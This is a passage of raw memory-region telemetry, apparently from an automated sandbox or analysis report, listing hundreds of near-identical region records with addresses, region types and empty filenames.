Region: id = 8701 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8702 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8703 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 8704 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 8705 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 8706 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 8707 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8708 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8709 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8710 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8711 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8712 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8713 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 8714 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8715 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8716 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8717 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8718 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8719 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8720 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8721 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8722 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8723 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8724 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8725 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8731 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 8732 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8733 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8734 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8735 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8736 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8737 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8738 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8739 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8740 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8741 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8742 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8743 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8744 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8745 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8746 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8747 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8748 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8749 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8750 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8751 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8752 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8753 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8754 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8755 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8756 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8757 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8758 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8759 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8760 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8761 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8931 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 8932 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 8933 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 8934 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 8935 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8936 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8937 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8938 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8939 start_va = 0x2a0000 end_va = 0x2b1fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8940 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8941 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8942 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8943 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8944 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8945 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8946 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8947 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8948 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8949 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8950 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8951 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8952 start_va = 0x2a0000 
end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8953 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8954 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8955 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8956 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9013 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9014 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9015 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9016 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9017 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9018 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9019 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9020 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9021 
start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9022 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9023 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9024 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9025 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9026 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9027 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9028 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9029 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9030 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9031 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9032 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9033 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 9034 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9042 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9043 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9044 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9045 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9046 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9047 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9048 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9049 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9050 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9051 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9052 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9053 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 9054 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9055 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9056 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9057 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9058 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9059 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9060 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9061 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9062 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9063 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9064 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9065 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9066 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 9067 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9068 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9069 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9070 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9071 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9072 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9073 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9074 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9075 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9076 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9077 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9078 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9079 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9080 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9081 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9082 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9083 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9084 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9085 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9086 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9087 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9088 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9089 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9090 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9091 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9092 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9093 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9094 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9095 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9096 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9097 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9098 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9099 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9179 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9180 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9181 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9182 start_va = 0x2b0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9183 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9184 start_va = 0x2a0000 end_va = 0x2b2fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9185 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9186 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9187 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9188 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9189 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9190 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9191 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9192 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9193 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9194 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9195 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9196 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9197 start_va = 0x2a0000 
end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9198 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9199 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9200 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9201 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9202 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9203 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9204 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9205 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9206 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9207 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9208 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9209 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9210 
